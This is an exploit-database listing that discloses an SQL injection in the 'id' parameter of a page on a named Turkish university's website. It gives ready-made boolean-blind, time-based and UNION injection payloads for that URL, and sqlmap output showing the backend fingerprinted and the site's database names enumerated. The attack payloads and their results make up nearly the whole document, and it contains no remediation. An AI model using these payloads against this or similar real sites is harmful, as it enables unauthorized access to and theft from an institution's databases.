CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-01-22 |
# Exploit Title: Bayburt Üniversitesi SQL Injection
# Date: 22.01.2020
# Exploit Author: Furkan Özer
# Vendor Homepage: bumer.bayburt.edu.tr
# Link: https://bumer.bayburt.edu.tr/haber.php?id=[] sql li

https://bumer.bayburt.edu.tr/haber.php?id=16

Payloads : id=16' AND 1280=1280 AND 'xtXi'='xtXi

Parameter: id (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=16' AND 1280=1280 AND 'xtXi'='xtXi

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=16' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))rjJt) AND 'AQkr'='AQkr

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=16' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x795147476369727a5770775858705943614948507a7547516368485175506b535873724463487263,0x716b627071),NULL,NULL, NULL,NULL,NULL-- pPTp

---

[19:18:07] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27, PHP
back-end DBMS: MySQL >= 5.0.12
[19:18:07] [INFO] fetching database names
available databases [6]:
[*] cobozero_adsd69
[*] cobozero_bumer6
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

[162 entries]
Copyright ©2024 Exploitalert.